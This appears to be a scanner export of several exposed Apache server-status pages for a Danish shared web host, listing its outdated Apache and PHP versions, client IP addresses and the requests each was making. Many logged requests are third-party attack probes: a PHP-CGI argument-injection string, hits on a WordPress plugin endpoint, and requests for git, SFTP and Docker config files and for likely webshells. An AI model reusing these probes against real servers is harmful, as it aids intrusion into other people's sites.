213.199.52.248webhotel5.webhosting.dkGET /rex/l/index.php HTTP/1.0 43-1-0/0/50. 0.09177600.00.000.01 213.199.52.248webhotel5.webhosting.dkGET /uploads/2020/09/themes.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde37c0de335
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 28-Sep-2024 17:43:04 CEST Restart Time: Saturday, 28-Sep-2024 16:05:04 CEST Parent Server Generation: 1 Server uptime: 1 hour 38 minutes Total accesses: 8784 - Total Traffic: 3.6 MB CPU Usage: u1.65 s.8 cu0 cs0 - .0417% CPU load 1.49 requests/sec - 635 B/second - 425 B/request 1 requests currently being processed, 30 idle workers ___________W___________________................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-186220/20/302_ 0.023500.00.000.26 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-186230/20/307_ 0.043500.00.000.09 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-186240/20/283_ 0.03321160.00.000.08 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 3-186250/20/282_ 0.0412160.00.010.09 54.36.148.8www.tutak.dk /NAVWEB/srn/7/b/dff8fec45b9984910d28738d102cf4b7.html HTTP/1.0 4-186260/20/282_ 0.041150.00.010.13 128.199.182.77webhotel5.webhosting.dkGET / HTTP/1.0 5-186630/20/275_ 0.05500.00.000.19 128.199.182.77webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 6-186620/20/275_ 0.04570.00.010.08 128.199.182.77webhotel5.webhosting.dkGET / HTTP/1.0 7-186640/20/275_ 0.04400.00.000.08 128.199.182.77webhotel5.webhosting.dkGET /server HTTP/1.0 8-186650/19/273_ 0.04300.00.000.16 128.199.182.77webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 9-186660/20/274_ 0.04200.00.010.08 128.199.182.77webhotel5.webhosting.dkGET /about HTTP/1.0 10-187110/20/274_ 0.03000.00.010.09 128.199.182.77webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 11-187120/19/273W 0.03000.00.010.10 128.199.182.77webhotel5.webhosting.dkGET /server-status HTTP/1.0 12-187130/19/273_ 0.044610.00.000.21 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 13-186170/20/222_ 0.033500.00.000.06 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-186270/20/222_ 0.069220.00.000.08 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 15-186670/20/222_ 0.04200.00.000.09 128.199.182.77webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 16-186680/20/222_ 0.03100.00.000.07 128.199.182.77webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 17-187220/19/220_ 0.044570.00.000.07 104.237.242.102webhotel5.webhosting.dkGET / HTTP/1.0 18-187310/19/221_ 0.0445140.00.010.07 202.61.230.209webhotel5.webhosting.dkGET / HTTP/1.0 19-187330/19/221_ 0.054300.00.000.06 24.60.193.251webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 20-187340/19/221_ 0.034200.00.000.08 139.135.71.238webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 21-187350/19/221_ 0.054250.00.000.07 202.61.230.209webhotel5.webhosting.dkGET / HTTP/1.0 22-187360/19/221_ 0.033910.00.000.07 52.167.144.186webhotel5.webhosting.dkex=15&querydesc=SearchJobQueryDescription&viewedfrom=1 HTTP/1.0 23-187370/19/171_ 0.033800.00.000.05 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 24-187380/19/171_ 0.033800.00.000.04 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-187550/19/171_ 0.043700.00.000.04 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-187560/19/171_ 0.023700.00.050.09 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-187570/19/171_ 0.033600.00.010.05 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-187690/18/168_ 0.033600.00.000.04 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-187810/19/169_ 0.033500.00.000.05 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-187820/19/208_ 0.053500.00.000.06 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 31-1-0/0/204. 0.11569820.00.000.07 193.233.16.13webhotel5.webhosting.dkid=rriqj&pid=twdux&rong1=wanik&song1=kkazx&pong1=ciqoe HTTP/1.0 32-1-0/0/154. 0.1156870.00.000.13 162.142.125.207webhotel5.webhosting.dkGET / HTTP/1.0 33-1-0/0/154. 0.11568850.00.000.06 205.210.31.56webhotel5.webhosting.dkGET / HTTP/1.0 34-1-0/0/153. 0.12567860.00.000.05 193.233.16.13webhotel5.webhosting.dkPOST / HTTP/1.0 35-1-0/0/153. 0.1256800.00.000.11 162.142.125.207webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 36-1-0/0/103. 0.11191300.00.000.03 156.146.56.131webhotel5.webhosting.dkGET /wp-content/themes/wp-pridmag/up.php HTTP/1.0 37-1-0/0/103. 0.11567340.00.000.03 54.36.149.95www.tutak.dk /NAVWEB/srn/2/6/a688cd6ef1522331362b6976a54f5b62.html HTTP/1.0 38-1-0/0/99. 0.1156400.00.000.18 193.233.16.13webhotel5.webhosting.dkPOST /wp-admin/admin-ajax.php?s1=s1 HTTP/1.0 39-1-0/0/100. 0.085631090.00.000.02 193.233.16.13webhotel5.webhosting.dkPOST / HTTP/1.0 40-1-0/0/100. 0.1056010.00.000.03 193.233.16.13webhotel5.webhosting.dkPOST /wp-json/ HTTP/1.0 41-1-0/0/100. 0.1155910.00.000.04 73.94.55.155webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 42-1-0/0/100. 0.125601010.00.000.02 193.233.16.13webhotel5.webhosting.dkGET / HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3039af405
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 18-Jul-2024 21:33:37 CEST Restart Time: Thursday, 18-Jul-2024 16:05:05 CEST Parent Server Generation: 5 Server uptime: 5 hours 28 minutes 31 seconds Total accesses: 12727 - Total Traffic: 27.7 MB CPU Usage: u.42 s.12 cu0 cs0 - .00274% CPU load .646 requests/sec - 1471 B/second - 2279 B/request 1 requests currently being processed, 30 idle workers ______________________.____W____................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-5386830/10/410_ 0.011200.00.011.00 92.118.39.244webhotel5.webhosting.dkGET /codebuild.yml HTTP/1.0 1-5386560/9/404_ 0.012630.00.011.24 69.63.184.9webhotel5.webhosting.dkGET / HTTP/1.0 2-5386820/9/402_ 0.002300.00.011.18 92.118.39.244webhotel5.webhosting.dkGET /codebuild.yml HTTP/1.0 3-5385980/9/405_ 0.004640.00.011.09 205.210.31.43webhotel5.webhosting.dkGET / HTTP/1.0 4-5382700/10/407_ 0.002100.00.010.80 114.119.159.148webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 5-5386540/9/404_ 0.0227610.00.010.64 100.42.176.98webhotel5.webhosting.dkPOST / HTTP/1.0 6-5386840/9/401_ 0.011500.00.010.98 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 7-5385870/9/402_ 0.015010.00.010.46 92.118.39.244webhotel5.webhosting.dkGET /docker-compose.yml HTTP/1.0 8-5385950/10/404_ 0.00000.00.011.23 159.89.12.166webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 9-5384290/11/404_ 0.02000.00.010.71 159.89.12.166webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 10-5386550/9/401_ 0.012700.00.010.45 69.63.184.114webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 11-5386850/9/401_ 0.03000.00.010.61 159.89.12.166webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 12-5386860/9/400_ 0.00010.00.010.36 159.89.12.166webhotel5.webhosting.dkGET /server HTTP/1.0 13-5386870/8/399_ 0.01000.00.020.41 159.89.12.166webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 14-5386890/8/399_ 0.005100.00.010.45 172.71.94.49webhotel5.webhosting.dkplugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.0 15-5386880/9/400_ 0.01000.00.010.55 159.89.12.166webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 16-5386900/8/398_ 0.004400.00.020.64 172.109.143.70webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 17-5386910/8/399_ 0.004200.00.010.64 173.80.44.121webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 18-5386920/8/396_ 0.003200.00.010.47 34.140.63.207webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 19-5386930/8/396_ 0.0039110.00.010.57 81.19.232.105www.kbw.dkGET / HTTP/1.0 20-5386940/8/395_ 0.003100.00.011.03 92.118.39.244webhotel5.webhosting.dkGET /docker-compose.yml HTTP/1.0 21-5383580/10/381_ 0.01700.00.010.68 173.80.44.121webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 22-5-0/0/389. 0.0630400.00.001.54 34.28.120.84webhotel5.webhosting.dkGET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0 23-5306820/41/346_ 0.062100.00.020.97 92.118.39.244webhotel5.webhosting.dkGET /.git/config HTTP/1.0 24-5374410/11/275_ 0.0221480.00.011.06 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 25-5384210/10/323_ 0.01030.00.011.16 159.89.12.166webhotel5.webhosting.dkGET / HTTP/1.0 26-5384220/10/352_ 0.01130.00.011.69 159.89.12.166webhotel5.webhosting.dkGET / HTTP/1.0 27-5385990/9/339W 0.00000.00.010.64 159.89.12.166webhotel5.webhosting.dkGET /server-status HTTP/1.0 28-5386570/9/339_ 0.012630.00.010.99 69.63.184.113webhotel5.webhosting.dkGET / HTTP/1.0 29-5384230/10/274_ 0.00000.00.011.05 159.89.12.166webhotel5.webhosting.dkGET /about HTTP/1.0 30-5386950/8/331_ 0.013160.00.010.86 34.140.63.207webhotel5.webhosting.dkGET / HTTP/1.0 31-5386960/8/270_ 0.0030710.00.010.61 81.19.232.105www.psykologaarhus.dkPOST / HTTP/1.0 32-5-0/0/293. 0.0831000.00.000.50 162.158.114.228webhotel5.webhosting.dkGET /contact HTTP/1.0 33-2-0/0/145. 0.02920700.00.000.06 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 34-2-0/0/145. 0.01920700.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-0-0/0/14. 0.021641000.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-0-0/0/14. 0.011641000.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-0-0/0/14. 0.031641000.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-0-0/0/14. 0.011641000.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-0-0/0/14. 0.011641000.00.000.19 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-0-0/0/14. 0.011641000.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-0-0/0/14. 0.011641000.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3b5c7c80d
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 16-Jul-2024 13:27:35 CEST Restart Time: Tuesday, 16-Jul-2024 06:05:04 CEST Parent Server Generation: 7 Server uptime: 7 hours 22 minutes 30 seconds Total accesses: 28608 - Total Traffic: 36.4 MB CPU Usage: u1.26 s.47 cu0 cs0 - .00652% CPU load 1.08 requests/sec - 1439 B/second - 1335 B/request 1 requests currently being processed, 30 idle workers ___W___________________________................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-7147050/17/921_ 0.052400.00.001.14 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-7147060/17/911_ 0.052410.00.000.82 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-7147070/17/858_ 0.022400.00.010.92 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-7147080/16/906W 0.04000.00.060.49 167.99.181.249webhotel5.webhosting.dkGET /server-status HTTP/1.0 4-7147100/14/906_ 0.02242250.00.000.57 54.200.50.80webhotel5.webhosting.dkGET / HTTP/1.0 5-7147110/14/906_ 0.0323640.00.000.39 54.202.106.235webhotel5.webhosting.dkGET / HTTP/1.0 6-7147120/14/866_ 0.022400.00.001.12 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-7147130/14/905_ 0.022300.00.021.23 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-7147140/14/905_ 0.012300.00.000.43 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-7147020/26/828_ 0.063400.00.011.03 66.249.76.162webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 10-7147150/14/904_ 0.042300.00.000.75 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-7147160/14/854_ 0.022300.00.003.07 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 12-7147170/14/746_ 0.031810.00.011.20 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 13-7147180/14/855_ 0.021800.00.011.19 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-7147190/14/855_ 0.021500.00.002.55 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-7147200/14/801_ 0.021500.00.000.91 52.167.144.218webhotel5.webhosting.dkplan-Skagen/Skagen-%C3%98sterby-Frederikshavn-Lej.html HTTP/1.0 16-7147210/14/801_ 0.021330.00.000.57 136.143.176.50webhotel5.webhosting.dkGET / HTTP/1.0 17-7147220/14/829_ 0.0213340.00.000.50 35.89.59.132webhotel5.webhosting.dkGET / HTTP/1.0 18-7147230/14/805_ 0.0311170.00.010.77 34.138.161.110www.karenborup.dkGET /kontakt_files/themedata.thmx HTTP/1.0 19-7147240/14/802_ 0.02620.00.010.41 167.99.181.249webhotel5.webhosting.dkGET / HTTP/1.0 20-7147250/14/802_ 0.02490.00.000.93 114.119.151.172www.lillekrabbe.dkGET /lab/tuts/gimphair4.htm HTTP/1.0 21-7147260/14/765_ 0.01240.00.000.77 167.99.181.249webhotel5.webhosting.dkGET / HTTP/1.0 22-7147270/14/764_ 0.02200.00.001.54 167.99.181.249webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 23-7147280/14/763_ 0.02200.00.001.20 167.99.181.249webhotel5.webhosting.dkGET /server HTTP/1.0 24-7147290/14/751_ 0.03100.00.000.89 167.99.181.249webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 25-7147300/14/711_ 0.01100.00.000.68 167.99.181.249webhotel5.webhosting.dkGET /about HTTP/1.0 26-7147310/14/630_ 0.01100.00.050.28 167.99.181.249webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 27-7147010/29/690_ 0.073000.00.010.29 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-7147320/14/670_ 0.03010.00.050.43 167.99.181.249webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 29-7147030/26/665_ 0.073460.00.011.13 66.249.76.162webhotel5.webhosting.dkGET / HTTP/1.0 30-7147330/14/566_ 0.02010.00.051.10 167.99.181.249webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 31-7-0/0/594. 0.0977040.00.001.48 79.110.62.125webhotel5.webhosting.dkGET /?next=http:google.com HTTP/1.0 32-7-0/0/542. 0.1177020.00.000.32 79.110.62.125webhotel5.webhosting.dkGET /?redir=/%09/google.com&redir=/%09/google.com HTTP/1.0 33-6-0/0/362. 0.01164800.00.000.88 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 34-6-0/0/288. 0.02164800.00.000.66 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-6-0/0/289. 0.02164800.00.000.98 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-6-0/0/239. 0.01164800.00.000.13 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-6-0/0/239. 0.02164800.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-6-0/0/176. 0.06391300.00.000.10 89.187.164.155webhotel5.webhosting.dkGET /cong.php HTTP/1.0 39-6-0/0/176. 0.07391300.00.000.53 89.187.164.155webhotel5.webhosting.dkGET /wp-mail.php HTTP/1.0 40-6-0/0/176. 0.07391300.00.000.57 89.187.164.155webhotel5.webhosting.dkGET /wp-content/index.php HTTP/1.0 41-6-0/0/175. 0.05391300.00.000.10 89.187.164.155webhotel5.webhosting.dkGET /wp-configs.php HTTP/1.0 42-6-0/0/175. 0.06391300.00.000.43 89.187.164.155webhotel5.webhosting.dkGET /mah.php HTTP/1.0 43-2-0/0/86. 0.061604700.00.000.70 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-1-0/0/50. 0.072123100.00.000.07 45.40.166.83webhotel5.webhosting.dkHEAD /BLOG HTTP/1.0 45-1-0/0/50. 0.072122900.00.000.07 66.249.66.18webhotel5.webhosting.dkGET /resultater/details/?id=3481 HTTP/1.0 46-1-0/0/50. 0.072122360.00.000.01 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3b82ee955
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 14-Jul-2024 12:41:21 CEST Restart Time: Sunday, 14-Jul-2024 06:05:04 CEST Parent Server Generation: 6 Server uptime: 6 hours 36 minutes 17 seconds Total accesses: 26753 - Total Traffic: 25.8 MB CPU Usage: u.59 s.27 cu0 cs0 - .00362% CPU load 1.13 requests/sec - 1139 B/second - 1012 B/request 1 requests currently being processed, 30 idle workers _____________.._W______.____.______............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-6196390/6/840_ 0.001730.00.000.71 27.68.153.134webhotel5.webhosting.dkGET / HTTP/1.0 1-6196400/6/817_ 0.001630.00.000.93 27.68.153.134webhotel5.webhosting.dkGET / HTTP/1.0 2-6188560/10/860_ 0.01600.00.000.61 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-6197570/6/812_ 0.00700.00.000.50 81.19.232.105www.all2one.dkGET /solr/admin/info/system?_=&wt=json HTTP/1.0 4-6195260/6/839_ 0.002400.00.000.71 81.19.232.105www.all2one.dkGET /public/plugins/xychart/plugin.json HTTP/1.0 5-6198390/6/853_ 0.00700.00.000.69 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 6-6198430/6/847_ 0.01240.00.000.49 134.122.28.88webhotel5.webhosting.dkGET / HTTP/1.0 7-6199520/6/847_ 0.00200.00.000.62 134.122.28.88webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 8-6195300/6/830_ 0.002100.00.000.71 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-6194840/7/797_ 0.011410.00.000.59 81.19.232.105www.all2one.dkGET /seeyon/main.do HTTP/1.0 10-6199780/6/828_ 0.01100.00.010.57 134.122.28.88webhotel5.webhosting.dkGET /server HTTP/1.0 11-6199800/6/828_ 0.00100.00.000.58 134.122.28.88webhotel5.webhosting.dkGET /about HTTP/1.0 12-6204750/3/825_ 0.00300.00.000.64 23.22.35.162webhotel5.webhosting.dkGET /wp-content/uploads/2022/05/jeans-2979818_640.jpg HTTP/1.0 13-6-0/0/778. 0.0820800.00.000.69 166.137.252.32webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 14-6-0/0/823. 0.0720500.00.000.72 81.19.232.105www.all2one.dkGET /api/graphql HTTP/1.0 15-6194890/7/789_ 0.01030.00.000.94 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 16-6194900/6/687W 0.00000.00.000.38 134.122.28.88webhotel5.webhosting.dkGET /server-status HTTP/1.0 17-6196560/6/688_ 0.011530.00.000.39 27.68.153.134webhotel5.webhosting.dkGET / HTTP/1.0 18-6194850/7/650_ 0.011100.00.000.33 81.19.232.105www.all2one.dkGET /mifs/user/login.jsp HTTP/1.0 19-6194880/7/689_ 0.01530.00.000.83 134.122.28.88webhotel5.webhosting.dkGET / HTTP/1.0 20-6195930/6/687_ 0.002140.00.000.56 27.68.153.134webhotel5.webhosting.dkGET / HTTP/1.0 21-6195040/6/689_ 0.002600.00.000.77 114.119.141.51webhotel5.webhosting.dk/ssdporn.top/vid-%D8%B3%DA%A9%D8%B3%DB%B9%DB%B7-1.html HTTP/1.0 22-6195060/6/706_ 0.002600.00.001.03 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 23-6-0/0/740. 0.0819530.00.000.84 205.210.31.148webhotel5.webhosting.dkGET / HTTP/1.0 24-6195310/6/744_ 0.002100.00.000.88 81.19.232.105www.all2one.dkGET /login HTTP/1.0 25-6195970/6/691_ 0.001930.00.000.83 27.68.153.134webhotel5.webhosting.dkGET / HTTP/1.0 26-6195980/6/740_ 0.011870.00.000.55 27.68.153.134webhotel5.webhosting.dkGET / HTTP/1.0 27-6196130/6/739_ 0.001800.00.000.59 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-6-0/0/720. 0.0615600.00.000.49 81.19.232.105www.all2one.dkGET /api/getServices HTTP/1.0 29-6194860/7/692_ 0.00800.00.002.23 52.70.240.171webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 30-6196380/6/643_ 0.011800.00.001.93 81.19.232.105www.all2one.dkPOST /graphql HTTP/1.0 31-6199790/6/514_ 0.00100.00.000.20 134.122.28.88webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 32-6199810/6/411_ 0.01000.00.000.24 134.122.28.88webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 33-6199820/6/411_ 0.00000.00.000.13 134.122.28.88webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 34-6199830/6/361_ 0.01000.00.000.11 134.122.28.88webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 35-5-0/0/438. 0.08286400.00.000.83 194.233.73.44webhotel5.webhosting.dkGET /term.php HTTP/1.0 36-5-0/0/337. 0.09286400.00.000.27 194.233.73.44webhotel5.webhosting.dkGET /edit-comments.php HTTP/1.0 37-6-0/0/281. 0.0823900.00.000.26 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 38-6-0/0/155. 0.0923710.00.000.04 81.19.232.105www.all2one.dkGET /SSL/administrator.jsp HTTP/1.0 39-1-0/0/16. 0.011687000.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-1-0/0/16. 0.011687000.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-1-0/0/16. 0.011687000.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-1-0/0/16. 0.011687000.00.000.07 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-1-0/0/16. 0.021687000.00.000.15 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-1-0/0/16. 0.021687000.00.000.10 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-1-0/0/16. 0.021687000.00.000.02 145.239.10.137webhotel5.webhosting.dkGET /help.php HTTP/1.0 46-1-0/0/15. 0.011687000.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3c11cfaf4
